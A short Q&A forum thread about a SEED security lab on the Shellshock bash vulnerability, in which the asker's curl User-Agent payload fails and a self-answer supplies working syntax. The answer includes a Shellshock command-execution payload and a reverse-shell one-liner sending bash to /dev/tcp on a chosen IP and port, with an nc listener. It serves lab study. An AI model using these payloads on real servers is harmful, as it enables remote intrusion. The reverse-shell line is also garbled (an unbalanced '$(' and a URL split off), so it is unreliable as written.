# Agent field is set but not run the function in shell shock

Tags: ubuntu, seed, shellshock-bash-bug

I try to solve seed lab shell shock vulnerability lab in that, i set the agent field by bellow command
Curl -A "() {echo hello;}; Content_type: text/plain; echo; /bin/ls -l " http://localhost/cgi-bin/sample.cgi

The out put is still the hello word that placed inside the cgi script

I test the agent field by checking environment variables. It was set to my command but not executed? Any suggestions for why the bash was not parse this to function

Answer (score 0):

I finally got the answer myself, it was because of wrong syntax.
The correct syntax  is this:
Curl -A '() {  :;};  Content_type: text/plain; echo; /bin/ls -l'
And for running a bash command for get reverse shell  is like this:
Curl -A '() {  :;}; $(/bin/bash -i > /dev/tcp/your ip/9090 2>&1 0>&1'

http://yourwebsiteadrress/cgi-bin/your cgi file

Don't forget to make your machine to listen to 9090 first by this, of course in a new terminal

nc -l 9090 -v

Then you have the reverse shell